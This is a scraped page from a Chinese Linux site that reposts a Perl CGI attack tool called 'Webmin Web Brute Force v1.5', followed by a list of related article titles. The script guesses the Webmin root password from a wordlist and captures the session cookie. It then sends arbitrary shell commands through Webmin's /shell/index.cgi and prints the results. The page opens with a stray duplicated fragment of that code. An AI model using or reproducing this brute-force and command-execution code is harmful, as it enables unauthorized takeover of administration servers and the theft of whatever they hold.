>/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/<\/pre><\/td><\/tr>/g){ exit; } else { print $answer; print results "[+]$answer\n"; } } } } #!/usr/bin/perl use CGI qw(:standard); use IO::Socket; $CGI::HEADERS_ONCE = 1; $CGI = new CGI; $atak = $CGI->param("atak"); $host = $CGI->param("host"); $wlist = $CGI->param("wlist"); $cmd = $CGI->param("cmd"); print $CGI->header(-type=>'text/html',-charset=>'windows-1254'); print qq~Webmin Web Brute Force v1.5 - cgi versiyon Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - _2@012.net.ilDiAblo_2@012.net.il
v1.5:By ZzagorR - zzagorrzzagorr@hotmail.com - www.rootbinbash.com
~; if($atak eq "webmin") { open (data, "$wlist"); @wordlist=; close data; $passx=@wordlist; $chk=0; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25) || die "[-] Webmin on this host does not exist\r\n"; $sock->close; print "[+] BruteForcing...
"; $sid; $n=0; while ($chk!=1) { $n++; if($n>$passx){ exit; } $pass=@wordlist[$passx-$n]; $pass_line="page=%2F&user=root&pass=$pass"; $buffer="POST /session_login.cgi HTTP/1.0\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/\n". "Cookie: testing=1\n". "Content-Type: application/x-www-form-urlencoded\n". "Content-Length: __\n". "\n". $pass_line."\n\n"; $line_size=length($pass_line); $buffer=~s/__/$line_size/g; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 25); if ($sock){ print "[+] Denenen sifre: $pass
"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/sid=(.*);/g){ $chk=1; $sid=$1; print "[+] Found SID : $sid
"; print "[+] Sifre : $pass
"; } } } $sock->close; } print "[+] Connecting to host once again
"; $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$host", PeerPort => "10000",Timeout => 10) || die "[-] Cant Connect once again for command execution\n"; print "[+] Connected.. Sending Buffer
"; $temp="-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"cmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pwd\"\n". "\n". "/root\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"history\"\n". "\n". "\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"previous\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604\n". "Content-Disposition: form-data; name=\"pcmd\"\n". "\n". "$cmd\n". "-----------------------------19777347561180971495777867604--\n\n"; $buffer_size=length($temp); $buffer="POST /shell/index.cgi HTTP/1.1\n". "Host: $host:10000\n". "Keep-Alive: 300\n". "Connection: keep-alive\n". "Referer: http://$host:10000/shell/\n". "Cookie: sid=$sid\; testing=1; x\n". "Content-Type: multipart/form-data; boundary=---------------------------19777347561180971495777867604\n". "Content-Length: siz\n". "\n". $temp; $buffer=~s/siz/$buffer_size/g; print $sock $buffer; if ($sock){ print "[+] Buffer sent...running command $cmd
"; print $sock $buffer; while ($answer=<$sock>){ if ($answer=~/defaultStatus="(.*)";/g) { print $1."
";} if ($answer=~/ >/g){ $cmd_chk=1; } if ($cmd_chk==1) { if ($answer=~/<\/pre><\/td><\/tr>/g){ exit; } else { print $answer; } } } } } if($atak eq ""){ print qq~~;
- 使用Linux L2TP/IPsec VPN 伺服器
- saltstack,windows客戶端遠程執行問題
- 關於使用expect編程遇到的疑問
- expect在執行命令返回結果中,有時候只返回一些結果,並卡住
- ssh自動登錄伺服器並執行一條命令取得返回結果後退出
- 如何使用BackTrack破解WIFI的WEP密鑰
- 利用fail2ban阻止ssh暴力破解密碼
- FENCE_IPMILAN執行REBOOT操作,機器確下電
- 實用的一行Linux命令
- OpenSSH 伺服器的 20 個最佳實踐
- FreeBSD下構建安全的Web伺服器
- virtualbox的新功能「支持從host 系統執行 guest 應用程序」?
- [轉]FreeBSD下構建安全的Web伺服器
- 構建安全的apache+mysql+php的web伺服器
- top命令詳解 .
- RedFlag 6 sp2 下無線破解2(aircrack-ng)
- 用dos命令破解網吧限制的方法和dos命令全集[color]
- postfix郵件伺服器執行telnet localhost 25卡在Escape character is '^]'不動了
- Webmin:Unix上的GUI管理工具(二)
- Linux下webmin的ssl加密管理
- webmin,非常棒的Linux管理工具
- Linux下chkconfig命令詳解
- 只需十分鐘 Linux環境下快速搭建維基網站
- RTX破解修改方法
- 安裝apache執行./configure時報告如下錯無
- 一條命令的魅力
- Webmin 暴力破解+ 執行命令
- 命令行方式下的列印操作
- 您的Java代碼安全嗎—還是暴露在外?
- 用Ubuntu破解WEP密鑰
[火星人 ] Webmin 暴力破解+ 執行命令已經有717次圍觀
http://coctec.com/docs/linux/show-post-136664.html
熱門文章